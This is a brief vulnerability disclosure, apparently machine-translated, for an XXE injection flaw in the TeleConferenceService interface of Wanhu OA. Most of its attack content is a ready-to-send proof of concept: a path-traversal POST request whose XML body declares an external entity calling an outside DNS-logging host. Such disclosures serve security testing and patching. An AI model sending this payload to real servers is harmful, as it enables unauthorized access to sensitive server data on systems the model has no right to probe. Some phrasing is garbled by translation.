Wanhu Oa Teleconferenceservice Xxe Injection Vulnerability

Wanhu OA TeleConferenceService XXE injection vulnerability

Vulnerability Description

There is an XXE injection vulnerability in the TeleConferenceService interface of Wanhu OA. The attacker can continue to inject XXE to obtain sensitive information on the server through the vulnerability.

Vulnerability Impact

Ten thousand households OA

Network surveying and mapping

Vulnerability reappears

Product Page

Verify POC

POST /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../TeleConferenceService

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "https://fep6kf.dnslog.cn" >]>        
<value>&xxe;</value>